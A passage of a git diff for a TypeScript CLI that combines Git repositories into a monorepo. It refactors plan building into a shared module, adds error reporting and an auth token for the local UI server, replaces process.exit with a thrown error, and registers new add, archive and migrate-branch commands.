'-c', 'user.name=monotize', 'commit', '-m', 'chore: pre-migration preparation (monotize)'], - { cwd: repo.path, stdio: 'pipe' } - ); - logger.success(`Applied ${repoPatches.length} patches to ${repo.name}`); + const status = execFileSync('git', ['status', '--porcelain'], { + cwd: repo.path, + encoding: 'utf-8', + }).trim(); + + if (status.length > 0) { + execFileSync( + 'git', + ['-c', 'user.email=monotize@monotize.dev', '-c', 'user.name=monotize', 'commit', '-m', 'chore: pre-migration preparation (monotize)'], + { cwd: repo.path, stdio: 'pipe' } + ); + } else { + logger.warn(`No staged changes to commit for ${repo.name} after patch apply`); + } + + logger.success(`Applied ${applied.length}/${repoPatches.length} patches to ${repo.name}`); + } else if (repoPatches.length > 0) { + logger.warn(`No patches were applied to ${repo.name}`); } else { logger.info(`No patches needed for ${repo.name}`); } + + if (failed.length > 0) { + logger.warn(`Failed patches for ${repo.name}: ${failed.join(', ')}`); + } } // Write .monotize/config.json @@ -169,7 +202,7 @@ export async function prepareCommand(repos: string[], options: CLIPrepareOptions targetNodeVersion, targetPackageManager, branchName, - appliedPatches: analysis.patches.map((p) => p.filename), + appliedPatches: successfullyAppliedPatches, }; await writeJson(path.join(monotizeDir, 'config.json'), config, { spaces: 2 }); @@ -225,6 +258,20 @@ export async function prepareCommand(repos: string[], options: CLIPrepareOptions logger.log(checklistMd); } + // --out mode: write PreparationPlan JSON + if (options.out) { + const { writeJson: wj } = await import('../utils/fs.js'); + const planOut = path.resolve(options.out); + const preparationPlan = { + schemaVersion: 1 as const, + createdAt: new Date().toISOString(), + checklist: analysis.checklist, + patches: analysis.patches, + }; + await wj(planOut, preparationPlan); + logger.success(`PreparationPlan written to ${planOut}`); + } + // Cleanup temp dir if we created one await cleanup(); } catch (error) { @@ -236,6 +283,6 @@ export async function prepareCommand(repos: string[], options: CLIPrepareOptions } await cleanup(); - process.exit(1); + throw new CliExitError(); } } diff --git a/src/commands/ui.ts b/src/commands/ui.ts index 55ee294..cb8b0e9 100755 --- a/src/commands/ui.ts +++ b/src/commands/ui.ts @@ -1,7 +1,8 @@ -import { exec } from 'node:child_process'; +import { execFile } from 'node:child_process'; import path from 'node:path'; import { fileURLToPath } from 'node:url'; import { createLogger } from '../utils/logger.js'; +import { CliExitError } from '../utils/errors.js'; interface CLIUiOptions { port: string; @@ -15,7 +16,7 @@ export async function uiCommand(options: CLIUiOptions): Promise { if (isNaN(port) || port < 0 || port > 65535) { logger.error(`Invalid port: ${options.port}`); - process.exit(1); + throw new CliExitError(); } // Dynamic import to avoid loading express/ws when running other CLI commands @@ -27,33 +28,54 @@ export async function uiCommand(options: CLIUiOptions): Promise { const __dirname = path.dirname(fileURLToPath(import.meta.url)); const uiDistDir = path.resolve(__dirname, '../ui/dist'); - const server = createServer({ port, staticDir: uiDistDir }); + const { server, token } = createServer({ port, staticDir: uiDistDir }); + await new Promise((resolve, reject) => { + const onListening = () => { + const addr = server.address(); + const actualPort = typeof addr === 'object' && addr ? addr.port : port; + const url = `http://localhost:${actualPort}`; - server.on('listening', () => { - const addr = server.address(); - const actualPort = typeof addr === 'object' && addr ? addr.port : port; - const url = `http://localhost:${actualPort}`; + logger.success(`Server running at ${url}`); + logger.info(`Auth token: ${token}`); + logger.info('Pass this token as Authorization: Bearer for API requests'); + logger.info('Press Ctrl+C to stop'); - logger.success(`Server running at ${url}`); - logger.info('Press Ctrl+C to stop'); - - if (options.open) { - const cmd = - process.platform === 'darwin' - ? 'open' + if (options.open) { + const browserUrl = `${url}?token=${token}`; + const { command, args } = process.platform === 'darwin' + ? { command: 'open', args: [browserUrl] } : process.platform === 'win32' - ? 'start' - : 'xdg-open'; - exec(`${cmd} ${url}`); - } - }); + ? { command: 'cmd', args: ['/c', 'start', '', browserUrl] } + : { command: 'xdg-open', args: [browserUrl] }; + execFile(command, args, (err) => { + if (err) logger.debug(`Failed to open browser: ${err.message}`); + }); + } + }; + + const onError = (err: NodeJS.ErrnoException) => { + cleanup(); + if (err.code === 'EADDRINUSE') { + logger.error(`Port ${port} is already in use. Try a different port with -p.`); + } else { + logger.error(`Server error: ${err.message}`); + } + reject(new CliExitError()); + }; + + const onClose = () => { + cleanup(); + resolve(); + }; + + const cleanup = () => { + server.off('listening', onListening); + server.off('error', onError); + server.off('close', onClose); + }; - server.on('error', (err: NodeJS.ErrnoException) => { - if (err.code === 'EADDRINUSE') { - logger.error(`Port ${port} is already in use. Try a different port with -p.`); - } else { - logger.error(`Server error: ${err.message}`); - } - process.exit(1); + server.on('listening', onListening); + server.on('error', onError); + server.on('close', onClose); }); } diff --git a/src/commands/verify-checks.ts b/src/commands/verify-checks.ts index cfd73a6..78c1760 100755 --- a/src/commands/verify-checks.ts +++ b/src/commands/verify-checks.ts @@ -20,12 +20,16 @@ export interface VerifyContext { dir: string | null; } +function getErrorMessage(error: unknown): string { + return error instanceof Error ? error.message : String(error); +} + // --------------------------------------------------------------------------- // Helpers // --------------------------------------------------------------------------- /** Read PackageInfo[] from a monorepo directory's packages/ subfolder. */ -async function readPackagesFromDir(dir: string): Promise { +async function readPackagesFromDir(dir: string, parseErrors?: string[]): Promise { const packagesDir = path.join(dir, 'packages'); if (!(await pathExists(packagesDir))) return []; @@ -47,8 +51,8 @@ async function readPackagesFromDir(dir: string): Promise { path: path.join(packagesDir, name), repoName: name, }); - } catch { - // skip malformed package.json + } catch (error) { + parseErrors?.push(`Failed to read ${pkgJsonPath}: ${getErrorMessage(error)}`); } } return packages; @@ -57,7 +61,7 @@ async function readPackagesFromDir(dir: string): Promise { /** Build PackageInfo[] from plan sources. * First tries reading package.json from the source path on disk. * Falls back to checking plan.files for packages//package.json entries. */ -async function packagesFromPlan(plan: ApplyPlan): Promise { +async function packagesFromPlan(plan: ApplyPlan, parseErrors?: string[]): Promise { const packages: PackageInfo[] = []; for (const source of plan.sources) { let pkgJson: Record | null = null; @@ -67,7 +71,9 @@ async function packagesFromPlan(plan: ApplyPlan): Promise { if (await pathExists(pkgJsonPath)) { try { pkgJson = await readJson>(pkgJsonPath); - } catch { /* fall through */ } + } catch (error) { + parseErrors?.push(`Failed to read ${pkgJsonPath}: ${getErrorMessage(error)}`); + } } // Fallback: check plan.files for an inline package.json @@ -79,7 +85,9 @@ async function packagesFromPlan(plan: ApplyPlan): Promise { if (pkgFile) { try { pkgJson = JSON.parse(pkgFile.content) as Record; - } catch { /* skip */ } + } catch (error) { + parseErrors?.push(`Failed to parse ${pkgFile.relativePath}: ${getErrorMessage(error)}`); + } } } @@ -100,9 +108,9 @@ async function packagesFromPlan(plan: ApplyPlan): Promise { } /** Get packages for the current context. */ -async function getPackages(ctx: VerifyContext): Promise { - if (ctx.plan) return packagesFromPlan(ctx.plan); - if (ctx.dir) return readPackagesFromDir(ctx.dir); +async function getPackages(ctx: VerifyContext, parseErrors?: string[]): Promise { + if (ctx.plan) return packagesFromPlan(ctx.plan, parseErrors); + if (ctx.dir) return readPackagesFromDir(ctx.dir, parseErrors); return []; } @@ -163,8 +171,17 @@ export async function checkRootPackageJson(ctx: VerifyContext): Promise>(path.join(ctx.dir, 'package.json')); hasWorkspacesField = root.workspaces !== undefined; - } catch { /* ignore */ } + } catch (error) { + rootReadError = getErrorMessage(error); + } + + const checks: VerifyCheck[] = []; if (hasPnpmWs || hasWorkspacesField) { - return [check('workspace-config', 'Workspace configuration found', 'pass', 'static', 'files[pnpm-workspace.yaml]')]; + checks.push(check('workspace-config', 'Workspace configuration found', 'pass', 'static', 'files[pnpm-workspace.yaml]')); + } else { + checks.push(check('workspace-config', 'No workspace configuration found', 'fail', 'static', 'files[pnpm-workspace.yaml]')); } - return [check('workspace-config', 'No workspace configuration found', 'fail', 'static', 'files[pnpm-workspace.yaml]')]; + + if (rootReadError) { + checks.push( + check( + 'workspace-config:root-package-json', + 'Could not read root package.json while checking workspace configuration', + 'fail', + 'static', + 'rootPackageJson.workspaces', + rootReadError + ) + ); + } + return checks; } return []; @@ -203,10 +240,23 @@ export async function checkWorkspaceConfig(ctx: VerifyContext): Promise { const checks: VerifyCheck[] = []; - const packages = await getPackages(ctx); + const parseErrors: string[] = []; + const packages = await getPackages(ctx, parseErrors); + + for (const [index, details] of parseErrors.entries()) { + checks.push(check( + `pkg-read-error:${index}`, + 'Failed to read one or more package.json files', + 'fail', + 'static', + undefined, + details + )); + } if (packages.length === 0) { - checks.push(check('pkg-names', 'No packages found', 'warn', 'static')); + const status: VerifyCheck['status'] = parseErrors.length > 0 ? 'fail' : 'warn'; + checks.push(check('pkg-names', 'No packages found', status, 'static')); return checks; } @@ -241,8 +291,17 @@ export async function checkRootScripts(ctx: VerifyContext): Promise>(path.join(ctx.dir, 'package.json')); scripts = (root.scripts as Record) || {}; - } catch { - return [check('root-scripts', 'Could not read root package.json scripts', 'warn', 'static')]; + } catch (error) { + return [ + check( + 'root-scripts', + 'Could not read root package.json scripts', + 'warn', + 'static', + 'rootPackageJson.scripts', + getErrorMessage(error) + ), + ]; } } @@ -301,8 +360,17 @@ export async function checkTsconfigSanity(ctx: VerifyContext): Promise>(path.join(ctx.dir, 'package.json')); hasEngines = root.engines !== undefined; - } catch { /* ignore */ } + } catch (error) { + rootReadError = getErrorMessage(error); + } } - checks.push( - hasEngines - ? check('root-engines', 'Root package.json has engines field', 'pass', 'static', 'rootPackageJson.engines') - : check('root-engines', 'Root package.json missing engines field', 'warn', 'static', 'rootPackageJson.engines') - ); + if (rootReadError) { + checks.push( + check( + 'root-engines', + 'Could not read root package.json for engines field check', + 'fail', + 'static', + 'rootPackageJson.engines', + rootReadError + ) + ); + } else { + checks.push( + hasEngines + ? check('root-engines', 'Root package.json has engines field', 'pass', 'static', 'rootPackageJson.engines') + : check('root-engines', 'Root package.json missing engines field', 'warn', 'static', 'rootPackageJson.engines') + ); + } return checks; } diff --git a/src/commands/verify.ts b/src/commands/verify.ts index 844c500..db9239e 100755 --- a/src/commands/verify.ts +++ b/src/commands/verify.ts @@ -3,6 +3,7 @@ import chalk from 'chalk'; import type { VerifyCheck, VerifyResult, VerifyTier } from '../types/index.js'; import { pathExists, readJson } from '../utils/fs.js'; import { createLogger, formatHeader } from '../utils/logger.js'; +import { CliExitError } from '../utils/errors.js'; import { validatePlan } from './apply.js'; import { type VerifyContext, @@ -42,11 +43,11 @@ export async function verifyCommand(options: CLIVerifyOptions): Promise { // Validate exactly one of --plan / --dir if (options.plan && options.dir) { logger.error('Specify either --plan or --dir, not both'); - process.exit(1); + throw new CliExitError(); } if (!options.plan && !options.dir) { logger.error('Specify either --plan or --dir '); - process.exit(1); + throw new CliExitError(); } let ctx: VerifyContext; @@ -58,12 +59,12 @@ export async function verifyCommand(options: CLIVerifyOptions): Promise { inputPath = path.resolve(options.plan); if (!(await pathExists(inputPath))) { logger.error(`Plan file not found: ${inputPath}`); - process.exit(1); + throw new CliExitError(); } const data = await readJson(inputPath); if (!validatePlan(data)) { logger.error('Invalid plan file'); - process.exit(1); + throw new CliExitError(); } ctx = { plan: data, dir: null }; } else { @@ -71,11 +72,11 @@ export async function verifyCommand(options: CLIVerifyOptions): Promise { inputPath = path.resolve(options.dir!); if (!(await pathExists(inputPath))) { logger.error(`Directory not found: ${inputPath}`); - process.exit(1); + throw new CliExitError(); } if (!(await pathExists(path.join(inputPath, 'package.json')))) { logger.error(`No package.json found in ${inputPath}`); - process.exit(1); + throw new CliExitError(); } ctx = { plan: null, dir: inputPath }; } @@ -140,7 +141,9 @@ export async function verifyCommand(options: CLIVerifyOptions): Promise { printVerifyReport(result, options.verbose ?? false); } - process.exit(result.ok ? 0 : 1); + if (!result.ok) { + throw new CliExitError(); + } } function printVerifyReport(result: VerifyResult, verbose: boolean): void { diff --git a/src/core/plan-builder.ts b/src/core/plan-builder.ts new file mode 100644 index 0000000..7b8c32b --- /dev/null +++ b/src/core/plan-builder.ts @@ -0,0 +1,308 @@ +import path from 'node:path'; +import type { + ApplyPlan, + ConflictStrategy, + FileCollision, + FileCollisionStrategy, + Logger, + PackageManagerConfig, + PackageManagerType, + PlanFile, + WorkspaceTool, + WorkflowMergeStrategy, +} from '../types/index.js'; +import { ensureDir, pathExists, readJson, writeJson } from '../utils/fs.js'; +import { validateRepoSources } from '../utils/validation.js'; +import { analyzeDependencies } from '../analyzers/dependencies.js'; +import { detectFileCollisions } from '../analyzers/files.js'; +import { cloneOrCopyRepos } from '../strategies/copy.js'; +import { + generateRootReadme, + mergeGitignores, + resolveFileCollisionToContent, +} from '../strategies/merge-files.js'; +import { generateWorkspaceConfig } from '../strategies/workspace-config.js'; +import { + generateWorkspaceToolConfig, + getWorkspaceToolDependencies, + updateScriptsForWorkspaceTool, +} from '../strategies/workspace-tools.js'; +import { mergeWorkflowsToFiles } from '../strategies/workflow-merge.js'; +import { + resolveDependencyConflicts, +} from '../resolvers/dependencies.js'; +import { + createPackageManagerConfig, + detectPackageManagerFromSources, + generateWorkspaceFiles, + getWorkspacesConfig, + getGitignoreEntries, + getPackageManagerField, + validatePackageManager, +} from '../strategies/package-manager.js'; + +export interface BuildPlanOptions { + repos: string[]; + outputDir: string; + packagesDir: string; + sourcesDir: string; + conflictStrategy: ConflictStrategy; + packageManager: PackageManagerType; + autoDetectPm?: boolean; + workspaceTool: WorkspaceTool; + workflowStrategy: WorkflowMergeStrategy; + install: boolean; + noHoist?: boolean; + pinVersions?: boolean; + yes?: boolean; + interactive?: boolean; + verbose?: boolean; + logger: Logger; + promptConflictStrategy?: () => Promise; + promptFileCollisionStrategy?: ( + collision: FileCollision + ) => Promise; +} + +export interface BuildPlanResult { + plan: ApplyPlan; + repoPaths: Array<{ path: string; name: string }>; + collisions: FileCollision[]; + depAnalysis: Awaited>; + pmType: PackageManagerType; + pmConfig: PackageManagerConfig; +} + +export async function buildApplyPlan(options: BuildPlanOptions): Promise { + const logger = options.logger; + const outputDir = path.resolve(options.outputDir); + const packagesDir = options.packagesDir; + const interactive = options.interactive ?? false; + const yes = options.yes ?? false; + const noHoist = options.noHoist ?? false; + const pinVersions = options.pinVersions ?? false; + + logger.info('Validating repository sources...'); + const validation = await validateRepoSources(options.repos); + if (!validation.valid) { + throw new Error(`Validation failed: ${validation.errors.join(', ')}`); + } + logger.success(`Found ${validation.sources.length} repositories to merge`); + + await ensureDir(options.sourcesDir); + logger.info('Fetching repositories...'); + const repoPaths = await cloneOrCopyRepos(validation.sources, options.sourcesDir, { + logger, + verbose: options.verbose, + }); + + let pmType = options.packageManager; + if (options.autoDetectPm) { + const detected = await detectPackageManagerFromSources(repoPaths); + if (detected) { + pmType = detected; + } + } + + const pmValidation = validatePackageManager(pmType); + if (!pmValidation.valid) { + throw new Error(pmValidation.error || 'Invalid package manager'); + } + const pmConfig = createPackageManagerConfig(pmType); + + logger.info('Analyzing dependencies...'); + const depAnalysis = await analyzeDependencies(repoPaths); + + logger.info('Detecting file collisions...'); + const collisions = await detectFileCollisions(repoPaths); + + let conflictStrategy = options.conflictStrategy; + if (depAnalysis.conflicts.length > 0 && conflictStrategy === 'prompt') { + if (interactive && !yes && options.promptConflictStrategy) { + conflictStrategy = await options.promptConflictStrategy(); + } else { + conflictStrategy = 'highest'; + } + } + + const resolvedDeps = await resolveDependencyConflicts( + depAnalysis.conflicts, + conflictStrategy, + depAnalysis.resolvedDependencies, + depAnalysis.resolvedDevDependencies + ); + + const fileStrategies = new Map(); + for (const collision of collisions) { + let strategy = collision.suggestedStrategy as FileCollisionStrategy; + if (interactive && !yes && collision.suggestedStrategy !== 'skip' && options.promptFileCollisionStrategy) { + strategy = await options.promptFileCollisionStrategy(collision); + } + fileStrategies.set(collision.path, strategy); + } + + const workspaceConfig = generateWorkspaceConfig(depAnalysis.packages, { + rootName: path.basename(outputDir), + packagesDir, + dependencies: noHoist ? {} : resolvedDeps.dependencies, + devDependencies: noHoist ? {} : resolvedDeps.devDependencies, + pmConfig, + }); + + if (options.workspaceTool !== 'none') { + const availableScripts = Object.keys( + (workspaceConfig.rootPackageJson.scripts as Record) || {} + ); + const updatedScripts = updateScriptsForWorkspaceTool( + workspaceConfig.rootPackageJson.scripts as Record, + options.workspaceTool, + availableScripts + ); + workspaceConfig.rootPackageJson.scripts = updatedScripts; + + const toolDeps = getWorkspaceToolDependencies(options.workspaceTool); + const existingDevDeps = + (workspaceConfig.rootPackageJson.devDependencies as Record) || {}; + workspaceConfig.rootPackageJson.devDependencies = { ...existingDevDeps, ...toolDeps }; + } + + const workspacesConfig = getWorkspacesConfig(pmConfig, packagesDir); + if (workspacesConfig) { + workspaceConfig.rootPackageJson.workspaces = workspacesConfig; + } + workspaceConfig.rootPackageJson.packageManager = getPackageManagerField(pmConfig); + + const planFiles: PlanFile[] = []; + + const workspaceFiles = generateWorkspaceFiles(pmConfig, packagesDir); + for (const file of workspaceFiles) { + planFiles.push({ relativePath: file.filename, content: file.content }); + } + + if (options.workspaceTool !== 'none') { + const toolConfig = generateWorkspaceToolConfig(depAnalysis.packages, options.workspaceTool); + if (toolConfig) { + planFiles.push({ relativePath: toolConfig.filename, content: toolConfig.content }); + } + } + + if (options.workflowStrategy !== 'skip') { + logger.info('Processing CI/CD workflows...'); + try { + const workflowFiles = await mergeWorkflowsToFiles(repoPaths, options.workflowStrategy); + planFiles.push( + ...workflowFiles.map((f) => ({ relativePath: f.relativePath, content: f.content })) + ); + } catch (error) { + const message = error instanceof Error ? error.message : String(error); + logger.warn(`Failed to process workflows: ${message}`); + } + } + + for (const collision of collisions) { + const strategy = fileStrategies.get(collision.path) || (collision.suggestedStrategy as FileCollisionStrategy); + const collisionFiles = await resolveFileCollisionToContent(collision, strategy, repoPaths); + planFiles.push( + ...collisionFiles.map((f) => ({ relativePath: f.relativePath, content: f.content })) + ); + } + + const hasGitignoreCollision = collisions.some((c) => c.path === '.gitignore'); + if (!hasGitignoreCollision) { + const gitignorePaths: string[] = []; + for (const r of repoPaths) { + const p = path.join(r.path, '.gitignore'); + if (await pathExists(p)) { + gitignorePaths.push(p); + } + } + + let gitignoreContent = + gitignorePaths.length > 0 + ? await mergeGitignores(gitignorePaths) + : 'node_modules/\ndist/\n.DS_Store\n*.log\n'; + const pmEntries = getGitignoreEntries(pmConfig); + if (pmEntries.length > 0) { + gitignoreContent += '\n# Package manager\n' + pmEntries.join('\n') + '\n'; + } + planFiles.push({ relativePath: '.gitignore', content: gitignoreContent }); + } + + const readmeContent = generateRootReadme( + repoPaths.map((r) => r.name), + packagesDir, + pmConfig + ); + planFiles.push({ relativePath: 'README.md', content: readmeContent }); + + if (noHoist) { + const npmrcContent = `# Prevent dependency hoisting - each package manages its own dependencies +# This helps avoid type conflicts between packages with different version requirements +shamefully-hoist=false +hoist=false + +# Use lowest satisfying versions to avoid breaking changes in newer releases +resolution-mode=lowest +`; + planFiles.push({ relativePath: '.npmrc', content: npmrcContent }); + } + + if (pinVersions) { + logger.debug('Pinning dependency versions (removing ^ and ~ ranges)'); + for (const repo of repoPaths) { + const pkgJsonPath = path.join(repo.path, 'package.json'); + if (!(await pathExists(pkgJsonPath))) continue; + try { + const pkgJson = await readJson>(pkgJsonPath); + let modified = false; + + const pinDeps = ( + deps: Record | undefined + ): Record | undefined => { + if (!deps) return deps; + const pinned: Record = {}; + for (const [name, version] of Object.entries(deps)) { + if (version.startsWith('^') || version.startsWith('~')) { + pinned[name] = version.slice(1); + modified = true; + } else { + pinned[name] = version; + } + } + return pinned; + }; + + pkgJson.dependencies = pinDeps(pkgJson.dependencies as Record); + pkgJson.devDependencies = pinDeps(pkgJson.devDependencies as Record); + pkgJson.peerDependencies = pinDeps(pkgJson.peerDependencies as Record); + + if (modified) { + await writeJson(pkgJsonPath, pkgJson, { spaces: 2 }); + } + } catch (error) { + const message = error instanceof Error ? error.message : String(error); + logger.warn(`Failed to pin versions in ${repo.name}: ${message}`); + } + } + } + + const plan: ApplyPlan = { + version: 1, + sources: repoPaths.map((r) => ({ name: r.name, path: r.path })), + packagesDir, + rootPackageJson: workspaceConfig.rootPackageJson, + files: planFiles, + install: options.install, + installCommand: pmConfig.installCommand, + analysisFindings: depAnalysis.findings, + }; + + return { + plan, + repoPaths, + collisions, + depAnalysis, + pmType, + pmConfig, + }; +} diff --git a/src/index.ts b/src/index.ts index ed9f2d8..10f7da7 100755 --- a/src/index.ts +++ b/src/index.ts @@ -8,13 +8,26 @@ import { planCommand } from './commands/plan.js'; import { verifyCommand } from './commands/verify.js'; import { prepareCommand } from './commands/prepare.js'; import { uiCommand } from './commands/ui.js'; +import { addCommand } from './commands/add.js'; +import { archiveCommand } from './commands/archive.js'; +import { migrateBranchCommand } from './commands/migrate-branch.js'; +import { registerConfigureCommand } from './commands/configure.js'; +import { CliExitError } from './utils/errors.js'; +import { readFileSync } from 'node:fs'; +import { fileURLToPath } from 'node:url'; +import { dirname, join } from 'node:path'; + +const __dirname = dirname(fileURLToPath(import.meta.url)); +const { version: MONOTIZE_VERSION } = JSON.parse( + readFileSync(join(__dirname, '..', 'package.json'), 'utf-8') +); const program = new Command(); program .name('monorepo') .description('Combine multiple Git repositories into a monorepo') - .version('0.2.0'); + .version(MONOTIZE_VERSION); program .command('merge') @@ -145,9 +158,58 @@ program .option('--patch-only', 'Emit patches only (default mode)') .option('--out-dir ', 'Write patches and checklist to directory') .option('--prep-workspace ', 'Clone repos, apply patches, commit on branch') + .option('--out ', 'Write PreparationPlan JSON to file') .option('-v, --verbose', 'Verbose output') .action(prepareCommand); +program + .command('add') + .description('Add a repository to an existing monorepo') + .argument('', 'Repository to add (URL, GitHub shorthand, or local path)') + .requiredOption('--to ', 'Path to target monorepo') + .option('-p, --packages-dir ', 'Packages subdirectory name', 'packages') + .option('--out ', 'Output path for plan JSON') + .option('--apply', 'Apply immediately after planning') + .option( + '--conflict-strategy ', + 'Dependency conflict resolution strategy (highest, lowest, prompt)', + 'highest' + ) + .option( + '--package-manager ', + 'Package manager to use (pnpm, yarn, yarn-berry, npm)', + 'pnpm' + ) + .option('-v, --verbose', 'Verbose output') + .action(addCommand); + +program + .command('archive') + .description('Generate deprecation notices and optionally archive source repositories') + .argument('', 'Repositories to archive (URLs or GitHub shorthand)') + .requiredOption('--monorepo-url ', 'URL of the monorepo these repos migrated to') + .option('--out ', 'Output path for archive plan JSON') + .option('--apply', 'Apply archive operations via GitHub API') + .option('--token-from-env', 'Read GitHub token from GITHUB_TOKEN environment variable') + .option('-v, --verbose', 'Verbose output') + .action(archiveCommand); + +program + .command('migrate-branch') + .description('Migrate a branch from a source repo to a monorepo') + .argument('', 'Branch name to migrate') + .requiredOption('--from ', 'Source repository path') + .requiredOption('--to ', 'Target monorepo path') + .option( + '--strategy ', + 'Migration strategy (subtree, replay)', + 'subtree' + ) + .option('--out ', 'Output path for branch plan JSON') + .option('--apply', 'Apply migration immediately') + .option('-v, --verbose', 'Verbose output') + .action(migrateBranchCommand); + program .command('ui') .description('Start the web UI server') @@ -156,4 +218,12 @@ program .option('-v, --verbose', 'Verbose output') .action(uiCommand); -program.parse(); +registerConfigureCommand(program); + +program.parseAsync().catch((err: unknown) => { + if (err instanceof CliExitError) { + process.exit(err.exitCode); + } + // Re-throw unexpected errors + throw err; +}); diff --git a/src/server/api.ts b/src/server/api.ts index 8edf7d7..a1c7d2c 100755 --- a/src/server/api.ts +++ b/src/server/api.ts @@ -20,6 +20,7 @@ import { ensureDir, writeJson, readFile, + readJson, pathExists, writeFile, move, @@ -35,32 +36,12 @@ import { generateRecommendations, } from '../commands/analyze.js'; import { - resolveDependencyConflicts, getConflictSummary, } from '../resolvers/dependencies.js'; import { - generateWorkspaceConfig, -} from '../strategies/workspace-config.js'; -import { - generateWorkspaceToolConfig, - getWorkspaceToolDependencies, - updateScriptsForWorkspaceTool, -} from '../strategies/workspace-tools.js'; -import { mergeWorkflowsToFiles } from '../strategies/workflow-merge.js'; -import { - generateRootReadme, - mergeGitignores, - resolveFileCollisionToContent, -} from '../strategies/merge-files.js'; -import { - createPackageManagerConfig, - generateWorkspaceFiles, - getWorkspacesConfig, - getGitignoreEntries, - getPackageManagerField, parsePackageManagerType, - validatePackageManager, } from '../strategies/package-manager.js'; +import { buildApplyPlan } from '../core/plan-builder.js'; import { validatePlan } from '../commands/apply.js'; import type { VerifyContext } from '../commands/verify-checks.js'; import { @@ -86,7 +67,6 @@ import { computePlanHash, } from '../utils/operation-log.js'; import type { OperationLogEntry, ApplyStepId } from '../types/index.js'; -import { readJson } from '../utils/fs.js'; import crypto from 'node:crypto'; // ─── Analyze ─────────────────────────────────────────────────────────────── @@ -158,8 +138,8 @@ export async function runAnalyze( } finally { try { await removeDir(tempDir); - } catch { - // Ignore cleanup errors + } catch (err) { + logger.debug?.('Failed to clean up temp dir: ' + (err instanceof Error ? err.message : String(err))); } } } @@ -184,189 +164,45 @@ export async function runPlan( logger: Logger, ): Promise<{ planPath: string; plan: ApplyPlan }> { const outputDir = path.resolve(options.output || './monorepo'); - const packagesDir = options.packagesDir || 'packages'; + const planFilePath = path.resolve(`${path.basename(outputDir)}.plan.json`); + const sourcesDir = `${planFilePath}.sources`; const workspaceTool: WorkspaceTool = options.workspaceTool || 'none'; const workflowStrategy: WorkflowMergeStrategy = options.workflowStrategy || 'combine'; - const noHoist = options.hoist === false; const conflictStrategy: ConflictStrategy = options.conflictStrategy || 'highest'; + const pmType = parsePackageManagerType(options.packageManager || 'pnpm'); - // Generate plan file path - const planFilePath = path.resolve(`${path.basename(outputDir)}.plan.json`); - const sourcesDir = `${planFilePath}.sources`; - - // Validate - logger.info('Validating repository sources...'); - const validation = await validateRepoSources(repos); - if (!validation.valid) { - throw new Error(`Validation failed: ${validation.errors.join(', ')}`); - } - logger.success(`Found ${validation.sources.length} repositories to merge`); - - // Clone/copy repos - await ensureDir(sourcesDir); - logger.info('Fetching repositories...'); - const repoPaths = await cloneOrCopyRepos(validation.sources, sourcesDir, { - logger, + const result = await buildApplyPlan({ + repos, + outputDir, + packagesDir: options.packagesDir || 'packages', + sourcesDir, + conflictStrategy, + packageManager: pmType, + autoDetectPm: false, + workspaceTool, + workflowStrategy, + install: options.install !== false, + noHoist: options.hoist === false, + pinVersions: options.pinVersions === true, + yes: true, + interactive: false, verbose: true, + logger, }); - // Package manager - const pmType = parsePackageManagerType(options.packageManager || 'pnpm'); - const pmValidation = validatePackageManager(pmType); - if (!pmValidation.valid) { - throw new Error(pmValidation.error!); - } - const pmConfig = createPackageManagerConfig(pmType); - - // Analyze dependencies - logger.info('Analyzing dependencies...'); - const depAnalysis = await analyzeDependencies(repoPaths); - - if (depAnalysis.conflicts.length > 0) { - const summary = getConflictSummary(depAnalysis.conflicts); + if (result.depAnalysis.conflicts.length > 0) { + const summary = getConflictSummary(result.depAnalysis.conflicts); logger.warn( - `Found ${depAnalysis.conflicts.length} dependency conflicts ` + + `Found ${result.depAnalysis.conflicts.length} dependency conflicts ` + `(${summary.incompatible} incompatible, ${summary.major} major, ${summary.minor} minor)`, ); } - // File collisions - logger.info('Detecting file collisions...'); - const collisions = await detectFileCollisions(repoPaths); - - // Resolve dependency conflicts (always use non-interactive strategy) - const resolvedDeps = await resolveDependencyConflicts( - depAnalysis.conflicts, - conflictStrategy, - depAnalysis.resolvedDependencies, - depAnalysis.resolvedDevDependencies, - ); - - // Generate workspace config - const workspaceConfig = generateWorkspaceConfig(depAnalysis.packages, { - rootName: path.basename(outputDir), - packagesDir, - dependencies: noHoist ? {} : resolvedDeps.dependencies, - devDependencies: noHoist ? {} : resolvedDeps.devDependencies, - pmConfig, - }); - - // Update scripts for workspace tool - if (workspaceTool !== 'none') { - const availableScripts = Object.keys( - (workspaceConfig.rootPackageJson.scripts as Record) || {}, - ); - const updatedScripts = updateScriptsForWorkspaceTool( - workspaceConfig.rootPackageJson.scripts as Record, - workspaceTool, - availableScripts, - ); - workspaceConfig.rootPackageJson.scripts = updatedScripts; - - const toolDeps = getWorkspaceToolDependencies(workspaceTool); - const existingDevDeps = - (workspaceConfig.rootPackageJson.devDependencies as Record) || {}; - workspaceConfig.rootPackageJson.devDependencies = { ...existingDevDeps, ...toolDeps }; - } - - // Add workspaces field for yarn/npm - const workspacesConfig = getWorkspacesConfig(pmConfig, packagesDir); - if (workspacesConfig) { - workspaceConfig.rootPackageJson.workspaces = workspacesConfig; - } - workspaceConfig.rootPackageJson.packageManager = getPackageManagerField(pmConfig); - - // Collect plan files - const planFiles: Array<{ relativePath: string; content: string }> = []; - - // Workspace files - const workspaceFilesList = generateWorkspaceFiles(pmConfig, packagesDir); - for (const file of workspaceFilesList) { - planFiles.push({ relativePath: file.filename, content: file.content }); - } - - // Workspace tool config - if (workspaceTool !== 'none') { - const toolConfig = generateWorkspaceToolConfig(depAnalysis.packages, workspaceTool); - if (toolConfig) { - planFiles.push({ relativePath: toolConfig.filename, content: toolConfig.content }); - } - } - - // Merge workflows - if (workflowStrategy !== 'skip') { - logger.info('Processing CI/CD workflows...'); - try { - const workflowFiles = await mergeWorkflowsToFiles(repoPaths, workflowStrategy); - planFiles.push( - ...workflowFiles.map((f) => ({ relativePath: f.relativePath, content: f.content })), - ); - } catch (error) { - logger.warn( - `Failed to process workflows: ${error instanceof Error ? error.message : String(error)}`, - ); - } - } - - // Handle file collisions (use suggested strategy for non-interactive) - for (const collision of collisions) { - const collisionFiles = await resolveFileCollisionToContent( - collision, - collision.suggestedStrategy, - repoPaths, - ); - planFiles.push( - ...collisionFiles.map((f) => ({ relativePath: f.relativePath, content: f.content })), - ); - } - - // .gitignore - const hasGitignoreCollision = collisions.some((c) => c.path === '.gitignore'); - if (!hasGitignoreCollision) { - const gitignorePaths: string[] = []; - for (const r of repoPaths) { - const p = path.join(r.path, '.gitignore'); - if (await pathExists(p)) { - gitignorePaths.push(p); - } - } - let gitignoreContent = - gitignorePaths.length > 0 - ? await mergeGitignores(gitignorePaths) - : 